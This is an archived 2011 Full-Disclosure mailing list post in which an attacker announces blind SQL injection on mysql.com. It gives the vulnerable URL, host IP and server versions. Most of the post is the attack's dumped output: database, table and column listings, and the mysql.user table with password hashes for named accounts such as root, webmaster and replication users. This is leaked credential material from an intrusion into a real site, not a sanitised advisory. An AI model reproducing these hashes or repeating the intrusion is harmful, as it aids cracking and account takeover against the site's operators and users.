lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <BLU152-w60E0C8ABB01955105D82E2FCBB0@phx.gbl>
Date: Sun, 27 Mar 2011 05:46:30 +0000
From: Jack haxor <jackh4xor@...ky0u.org>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: MySQL.com Vulnerable To Blind SQL Injection
	Vulnerability



---------------------------------------------------------------------------------------
[+] MySQL.com Vulnerable To Blind SQL Injection vulnerability
[+] Author: Jackh4xor @ w4ck1ng
[+] Site: http://www.jackh4xor.com
---------------------------------------------------------------------------------------

About MySQL.com :
--------------------------------------------------------------------------------------------------------------------

The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and the production support. The wide range of products include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and last but not least the MaxDB- the open source database certified for SAP/R3. The Mysql services are also made available for you. Choose among the Mysql training for database solutions, Mysql certification for the Developers and DBAs, Mysql consulting and support. It makes no difference if you are new in the database technology or a skilled developer of DBA, Mysql proposes services of all sorts for their customers. 
--------------------------------------------------------------------------------------------------------------------

                                   

Vulnerable Target  :   http://mysql.com/customers/view/index.html?id=1170
Host IP                  :   213.136.52.29
Web Server           :   Apache/2.2.15 (Fedora)
Powered-by           :   PHP/5.2.13
Injection Type        :   MySQL Blind
Current DB             :   web

Data Bases:    

information_schema
bk
certification
c?ashme
cust_sync_interim
customer
dbasavings
downloads
feedback
glassfish_interface
intranet
kaj
license_customers
manual
manual_search
mem
mysql
mysqlforge
mysqlweb
news_events
partner_t?aining
partners
partners_bak
phorum5
planetmysql
qa_contribution
quickpoll
robin
rp
sampo
sampo_interface
sessions
softrax
softrax_interim
solutions
tco
test
track
track_refer
wb
web
web_control
web_projects
web_training
webwiki
wordpress
zack

Current DB: web

Tables

xing_validation        
v_web_submissions      
userbk 
user_extra     

user  Columns: cwpid version lead_quality sfid industry address2 created last_modified lang notify newsletter gid title fax cell phone country zipcode state city address business company position lastname firstname passwd verified bounces email user_id

us_zip_state   
us_area_state  
unsub_log      
trials 
trial_external_log     
trial_data     
trial_alias    
training_redirect      
tag_blacklist  
tag_applied    
tag    
support_feeds_DROP     
support_entries_DROP   
states 
snapshots_builds       
snapshots      
sakilapoints   
regions        
quote_customer 
quote  
quicklinks     
promo  
product_releases       
position       
partner        
paper_lead     
paper_details_options  
paper_details_old      
paper_details  
paper  
newsletter_unsub       
nav_sites      
nav_items      
mysql_history  
mirror_status  
mirror_country 
mirror_continent       
mirror 
mailing_list_member    
mailing_list   
locks  
lead_validity_rules    
lead_source_xref       
lead_source_external   
lead_source    
lead_routing_rule      
lead_rep       
lead_old       
lead_note      
lead_extra_old 
lead_extra_new 
lead_extra     
lead_companies 
lead_campaign_member   
lead   
language_strings       
language_modules       
imagecache     
hall_of_fame   
g_search_term  
g_search_data  
g_blog_data    
forum_comment  
forms  
field_xref     
field_options  
field_match    
email_blacklist        
email_a_friend 
drpl_manual_review     
drpl_denied    
drpl_check_log 
drpl_cache     
customer_meta_sets     
customer_meta_set      
customer_meta  
customer       
coupon_product 
coupon_campaign_attribute      
coupon_campaign        
coupon 
country        
countries      
campaign_type  
campaign_topic 
campaign_score 
campaign_listdata      
campaign_detail        
business       
bounces        

Database : mysql
Table:

user_info    

user     Column: Update_pri Insert_priv Select_priv Password User Host

time_zone_transition_type    
time_zone_transition    
time_zone_name    
time_zone_leap_second    
time_zone    
tables_priv    
slow_log    
?ervers    
procs_priv    
proc    
plugin    
ndb_binlog_index    
inventory    
host    
help_topic    
help_relation    
help_keyword    
help_category    
general_log    
func    
event    
db    
columns_priv


# mysql.user Data

Password                                      User            Host
                                                wembaster     %
                                            monitor     10.%
                                            sys             %
                                            sys             localhost
*06581D0A5474DFF4D5DA3CE0CD7702FA52601412     forumread     %
*0702AEBF8E92A002E95D40247776E1A67CD2CA3F     wb             %
*2A57F767D29295B3CB8D01C760D9939649483F85     flipper     10.%
*32F623705BFFFE682E7BD18D5357B38EF8A5BAA9     wordpress     %
*66A905D4110DF14B41D585FDBCE0666AD13DD8C1     nagios             %
*704EB56151317F27573BB4DDA98EDF00FFABAAF8     root             localhost
*ED1BDC19B08FD41017EE180169E5CEB2C77F941A     mysqlforge     %
*FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B     webleads     10.%
00680dd718880337                             olof             %
077f61a849269b62     qa_r     %
077f61a849269b62     qa_rw     %
077f61a849269b62     qa_adm     %
0c2f46ba6b87d4ea     trials_admin     10.%
1856b9b03b5a6f47     cacti     %
19519e95545509b5     certification     %
1a39dcad63bbc7a6     gf_mschiff     %
2277fd7d562ec459     webslave     localhost
2277fd7d562ec459     webslave     %
304404b114b5516c     planetmysql_rw     %
35e376451a87adb0     planetmysql_ro     %
4e203d581b756a93     webmaster     localhost
4e203d581b756a93     webmaster     %
4e93479179a8ec93     sysadm     %
575ec47e16c7e20e     phorum5     %
575ec47e16c7e20e     lenz     %
5f340ec40a706f64     robin     %
61113da02d2c97a5     regdata     %
616075f256f111ba     myadmin     10.100.6.44
61711eea3de509ac     merlin     127.0.0.1
6302de0909a369a1     ebraswell     %
6b72b2824cc7f6fe     mysqlweb     %
6ffd2b17498cdd44     zack     %
70599cf351c6f591     repl     %
740284817e3ed5a8     webwiki     %
74c5529b41a97cc2     web_projects    

Databsae: web_control

Table:
system    
system_command    
service_request    
run_control    
request_daemon    
rebuild_server    
rebuild_queue    
rebuild_control    
quarterly_lead_report    
newsletter_log    
newsletter_control    
ips    
hosts  Columns:notes description name
dns_servers Columns: name internal ip


Database: certification

Tables:
signup    
corpcustomers    
certexamdata    
certcandidatedata    
certaccess


Database: wordpress

Tables:

wp_4_term_taxonom    
wp_4_term_relationships    
wp_4_posts    
wp_4_postmeta    
wp_4_options    
wp_4_links    
wp_4_comments    
wp_3_terms    
wp_3_term_taxonomy    
wp_3_term_relationships    
wp_3_posts    
wp_3_postmeta    
wp_3_options    
wp_3_links    
wp_3_comments    
wp_2_terms    
wp_2_term_taxonomy    
wp_2_term_relationships    
wp_2_posts    
wp_2_postmeta    
wp_2_options    
wp_2_links    
wp_2_comments    
wp_1_terms    
wp_1_term_taxonomy    
wp_1_term_relationships    
wp_1_posts    
wp_1_postmeta    
wp_1_options    
wp_1_links    
wp_1_comments    
wp_11_terms    
wp_11_term_taxonomy    
wp_11_term_relationships    
wp_11_posts    
wp_11_postmeta    
wp_11_options    
wp_11_links    
wp_11_comments    
wp_10_terms    
wp_10_term_taxonomy    
wp_10_term_relationships    
wp_10_posts    
wp_10_postmeta    
wp_10_options    
wp_10_links    
wp_10_comments    
remove_queries



Database: bk

Table:
wp_backupterm_taxonomy    
wp_backupterm_relationships    
wp_backupposts    
wp_backuppostmeta    
wp_backupoptions    
wp_backuplinks    
wp_backupcomments


-----------------------------------------------------------------------------------
Signed : Jackh4xor ! 

Greetz : rooto, Mr.52, zone-hacker, w4ck1ng

(In)Security
-------------------------------------------------------------------------------------


 		 	   		  
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ